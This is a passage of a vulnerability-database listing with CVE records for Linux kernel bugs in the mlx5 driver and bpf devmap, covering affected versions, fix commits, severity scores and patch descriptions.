            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.5",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.11",
                "status": "unaffected",
                "version": "5.10.216",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.16",
                "status": "unaffected",
                "version": "5.15.156",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.2",
                "status": "unaffected",
                "version": "6.1.87",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.28",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.9",
                "status": "unaffected",
                "version": "6.8.7",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.1,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "NONE",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35960",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-16T21:09:41.022641Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-16T21:09:59.289Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.117Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de0139719cdda82806a47580ca0df06fc85e0bd2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1263b0b26077b1183c3c45a0a2479573a351d423"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7aaee12b804c5e0374e7b132b6ec2158ff33dd64"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e8dc5cffc844dacfa79f056dea88002312f253f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5cf5337ef701830f173b4eec00a4f984adeb57a0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/adf67a03af39095f05d82050f15813d6f700159d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7c6782ad4911cbee874e85630226ed389ff2e453"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlx5/core/fs_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "de0139719cdda82806a47580ca0df06fc85e0bd2",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "1263b0b26077b1183c3c45a0a2479573a351d423",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "7aaee12b804c5e0374e7b132b6ec2158ff33dd64",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "2e8dc5cffc844dacfa79f056dea88002312f253f",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "5cf5337ef701830f173b4eec00a4f984adeb57a0",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "adf67a03af39095f05d82050f15813d6f700159d",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            },
            {
              "lessThan": "7c6782ad4911cbee874e85630226ed389ff2e453",
              "status": "affected",
              "version": "74491de937125d0c98c9b9c9208b4105717a3caa",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlx5/core/fs_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Properly link new fs rules into the tree\n\nPreviously, add_rule_fg would only add newly created rules from the\nhandle into the tree when they had a refcount of 1. On the other hand,\ncreate_flow_handle tries hard to find and reference already existing\nidentical rules instead of creating new ones.\n\nThese two behaviors can result in a situation where create_flow_handle\n1) creates a new rule and references it, then\n2) in a subsequent step during the same handle creation references it\n   again,\nresulting in a rule with a refcount of 2 that is not linked into the\ntree, will have a NULL parent and root and will result in a crash when\nthe flow group is deleted because del_sw_hw_rule, invoked on rule\ndeletion, assumes node-\u003eparent is != NULL.\n\nThis happened in the wild, due to another bug related to incorrect\nhandling of duplicate pkt_reformat ids, which lead to the code in\ncreate_flow_handle incorrectly referencing a just-added rule in the same\nflow handle, resulting in the problem described above. Full details are\nat [1].\n\nThis patch changes add_rule_fg to add new rules without parents into\nthe tree, properly initializing them and avoiding the crash. This makes\nit more consistent with how rules are added to an FTE in\ncreate_flow_handle."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:16.502Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/de0139719cdda82806a47580ca0df06fc85e0bd2"
        },
        {
          "url": "https://git.kernel.org/stable/c/1263b0b26077b1183c3c45a0a2479573a351d423"
        },
        {
          "url": "https://git.kernel.org/stable/c/3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801"
        },
        {
          "url": "https://git.kernel.org/stable/c/7aaee12b804c5e0374e7b132b6ec2158ff33dd64"
        },
        {
          "url": "https://git.kernel.org/stable/c/2e8dc5cffc844dacfa79f056dea88002312f253f"
        },
        {
          "url": "https://git.kernel.org/stable/c/5cf5337ef701830f173b4eec00a4f984adeb57a0"
        },
        {
          "url": "https://git.kernel.org/stable/c/adf67a03af39095f05d82050f15813d6f700159d"
        },
        {
          "url": "https://git.kernel.org/stable/c/7c6782ad4911cbee874e85630226ed389ff2e453"
        }
      ],
      "title": "net/mlx5: Properly link new fs rules into the tree",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35960",
    "datePublished": "2024-05-20T09:41:51.900Z",
    "dateReserved": "2024-05-17T13:50:33.137Z",
    "dateUpdated": "2025-05-04T09:09:16.502Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26885 (GCVE-0-2024-26885)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:58

Title

bpf: Fix DEVMAP_HASH overflow check on 32-bit arches

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Fix DEVMAP_HASH overflow check on 32-bit arches The devmap code allocates a number hash buckets equal to the next power of two of the max_entries value provided when creating the map. When rounding up to the next power of two, the 32-bit variable storing the number of buckets can overflow, and the code checks for overflow by checking if the truncated 32-bit value is equal to 0. However, on 32-bit arches the rounding up itself can overflow mid-way through, because it ends up doing a left-shift of 32 bits on an unsigned long value. If the size of an unsigned long is four bytes, this is undefined behaviour, so there is no guarantee that we'll end up with a nice and tidy 0-value at the end. Syzbot managed to turn this into a crash on arm32 by creating a DEVMAP_HASH with max_entries > 0x80000000 and then trying to update it. Fix this by moving the overflow check to before the rounding up operation.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1f5e352b9088211fa…
	https://git.kernel.org/stable/c/4b81a9f92b3676cb7…
	https://git.kernel.org/stable/c/c826502bed93970f2…
	https://git.kernel.org/stable/c/edf7990baa48de509…
	https://git.kernel.org/stable/c/250051acc21f9d4c5…
	https://git.kernel.org/stable/c/22079b3a423382335…
	https://git.kernel.org/stable/c/e89386f62ce9a9ab9…
	https://git.kernel.org/stable/c/281d464a34f540de1…

Impacted products

Vendor

Product

Version

Linux

Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < 1f5e352b9088211fa5eb4e1639cd365f4f7d2f65 (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < 4b81a9f92b3676cb74b907a7a209b3d15bd9a7f9 (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < c826502bed93970f2fd488918a7b8d5f1d30e2e3 (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < edf7990baa48de5097daa9ac02e06cb4c798a737 (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < 250051acc21f9d4c5c595e4fcb55986ea08c4691 (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < 22079b3a423382335f47d9ed32114e6c9fe88d7c (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < e89386f62ce9a9ab9a94835a9890883c23d9d52c (git)
Affected: 6f9d451ab1a33728adb72d7ff66a7b374d665176 , < 281d464a34f540de166cee74b723e97ac2515ec3 (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 5.4.285 , ≤ 5.4.* (semver)
Unaffected: 5.10.227 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:5.4:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "5.4"
              },
              {
                "status": "affected",
                "version": "6f9d451ab1a3"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26885",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:51:32.926370Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:30.477Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.424Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/225da02acdc97af01b6bc6ce1a3e5362bf01d3fb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c826502bed93970f2fd488918a7b8d5f1d30e2e3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edf7990baa48de5097daa9ac02e06cb4c798a737"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/250051acc21f9d4c5c595e4fcb55986ea08c4691"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/22079b3a423382335f47d9ed32114e6c9fe88d7c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e89386f62ce9a9ab9a94835a9890883c23d9d52c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/281d464a34f540de166cee74b723e97ac2515ec3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/devmap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1f5e352b9088211fa5eb4e1639cd365f4f7d2f65",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "4b81a9f92b3676cb74b907a7a209b3d15bd9a7f9",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "c826502bed93970f2fd488918a7b8d5f1d30e2e3",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "edf7990baa48de5097daa9ac02e06cb4c798a737",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "250051acc21f9d4c5c595e4fcb55986ea08c4691",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "22079b3a423382335f47d9ed32114e6c9fe88d7c",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "e89386f62ce9a9ab9a94835a9890883c23d9d52c",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            },
            {
              "lessThan": "281d464a34f540de166cee74b723e97ac2515ec3",
              "status": "affected",
              "version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/devmap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.285",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.227",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.285",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.227",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix DEVMAP_HASH overflow check on 32-bit arches\n\nThe devmap code allocates a number hash buckets equal to the next power\nof two of the max_entries value provided when creating the map. When\nrounding up to the next power of two, the 32-bit variable storing the\nnumber of buckets can overflow, and the code checks for overflow by\nchecking if the truncated 32-bit value is equal to 0. However, on 32-bit\narches the rounding up itself can overflow mid-way through, because it\nends up doing a left-shift of 32 bits on an unsigned long value. If the\nsize of an unsigned long is four bytes, this is undefined behaviour, so\nthere is no guarantee that we\u0027ll end up with a nice and tidy 0-value at\nthe end.\n\nSyzbot managed to turn this into a crash on arm32 by creating a\nDEVMAP_HASH with max_entries \u003e 0x80000000 and then trying to update it.\nFix this by moving the overflow check to before the rounding up\noperation."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:51.351Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1f5e352b9088211fa5eb4e1639cd365f4f7d2f65"
        },
        {
          "url": "https://git.kernel.org/stable/c/4b81a9f92b3676cb74b907a7a209b3d15bd9a7f9"
        },
        {
          "url": "https://git.kernel.org/stable/c/c826502bed93970f2fd488918a7b8d5f1d30e2e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/edf7990baa48de5097daa9ac02e06cb4c798a737"
        },
        {
          "url": "https://git.kernel.org/stable/c/250051acc21f9d4c5c595e4fcb55986ea08c4691"
        },
        {
          "url": "https://git.kernel.org/stable/c/22079b3a423382335f47d9ed32114e6c9fe88d7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/e89386f62ce9a9ab9a94835a9890883c23d9d52c"
        },
        {
          "url": "https://git.kernel.org/stable/c/281d464a34f540de166cee74b723e97ac2515ec3"
        }
      ],
      "title": "bpf: Fix DEVMAP_HASH overflow check on 32-bit arches",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26885",
    "datePublished": "2024-04-17T10:27:40.300Z",
    "dateReserved": "2024-02-19T14:20:24.185Z",
    "dateUpdated": "2025-05-04T08:58:51.351Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27014 (GCVE-0-2024-27014)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:17

Title

net/mlx5e: Prevent deadlock while disabling aRFS

Summary

In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Prevent deadlock while disabling aRFS When disabling aRFS under the `priv->state_lock`, any scheduled aRFS works are canceled using the `cancel_work_sync` function, which waits for the work to end if it has already started. However, while waiting for the work handler, the handler will try to acquire the `state_lock` which is already acquired. The worker acquires the lock to delete the rules if the state is down, which is not the worker's responsibility since disabling aRFS deletes the rules. Add an aRFS state variable, which indicates whether the aRFS is enabled and prevent adding rules when the aRFS is disabled. Kernel log: ====================================================== WARNING: possible circular locking dependency detected 6.7.0-rc4_net_next_mlx5_5483eb2 #1 Tainted: G I ------------------------------------------------------ ethtool/386089 is trying to acquire lock: ffff88810f21ce68 ((work_completion)(&rule->arfs_work)){+.+.}-{0:0}, at: __flush_work+0x74/0x4e0 but task is already holding lock: ffff8884a1808cc0 (&priv->state_lock){+.+.}-{3:3}, at: mlx5e_ethtool_set_channels+0x53/0x200 [mlx5_core] which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (&priv->state_lock){+.+.}-{3:3}: __mutex_lock+0x80/0xc90 arfs_handle_work+0x4b/0x3b0 [mlx5_core] process_one_work+0x1dc/0x4a0 worker_thread+0x1bf/0x3c0 kthread+0xd7/0x100 ret_from_fork+0x2d/0x50 ret_from_fork_asm+0x11/0x20 -> #0 ((work_completion)(&rule->arfs_work)){+.+.}-{0:0}: __lock_acquire+0x17b4/0x2c80 lock_acquire+0xd0/0x2b0 __flush_work+0x7a/0x4e0 __cancel_work_timer+0x131/0x1c0 arfs_del_rules+0x143/0x1e0 [mlx5_core] mlx5e_arfs_disable+0x1b/0x30 [mlx5_core] mlx5e_ethtool_set_channels+0xcb/0x200 [mlx5_core] ethnl_set_channels+0x28f/0x3b0 ethnl_default_set_doit+0xec/0x240 genl_family_rcv_msg_doit+0xd0/0x120 genl_rcv_msg+0x188/0x2c0 netlink_rcv_skb+0x54/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x1a1/0x270 netlink_sendmsg+0x214/0x460 __sock_sendmsg+0x38/0x60 __sys_sendto+0x113/0x170 __x64_sys_sendto+0x20/0x30 do_syscall_64+0x40/0xe0 entry_SYSCALL_64_after_hwframe+0x46/0x4e other info that might help us debug this: Possible unsafe locking scenario: CPU0 CPU1 ---- ---- lock(&priv->state_lock); lock((work_completion)(&rule->arfs_work)); lock(&priv->state_lock); lock((work_completion)(&rule->arfs_work)); *** DEADLOCK *** 3 locks held by ethtool/386089: #0: ffffffff82ea7210 (cb_lock){++++}-{3:3}, at: genl_rcv+0x15/0x40 #1: ffffffff82e94c88 (rtnl_mutex){+.+.}-{3:3}, at: ethnl_default_set_doit+0xd3/0x240 #2: ffff8884a1808cc0 (&priv->state_lock){+.+.}-{3:3}, at: mlx5e_ethtool_set_channels+0x53/0x200 [mlx5_core] stack backtrace: CPU: 15 PID: 386089 Comm: ethtool Tainted: G I 6.7.0-rc4_net_next_mlx5_5483eb2 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x60/0xa0 check_noncircular+0x144/0x160 __lock_acquire+0x17b4/0x2c80 lock_acquire+0xd0/0x2b0 ? __flush_work+0x74/0x4e0 ? save_trace+0x3e/0x360 ? __flush_work+0x74/0x4e0 __flush_work+0x7a/0x4e0 ? __flush_work+0x74/0x4e0 ? __lock_acquire+0xa78/0x2c80 ? lock_acquire+0xd0/0x2b0 ? mark_held_locks+0x49/0x70 __cancel_work_timer+0x131/0x1c0 ? mark_held_locks+0x49/0x70 arfs_del_rules+0x143/0x1e0 [mlx5_core] mlx5e_arfs_disable+0x1b/0x30 [mlx5_core] mlx5e_ethtool_set_channels+0xcb/0x200 [mlx5_core] ethnl_set_channels+0x28f/0x3b0 ethnl_default_set_doit+0xec/0x240 genl_family_rcv_msg_doit+0xd0/0x120 genl_rcv_msg+0x188/0x2c0 ? ethn ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/46efa4d5930cf3c2a…
	https://git.kernel.org/stable/c/48c4bb81df19402d4…
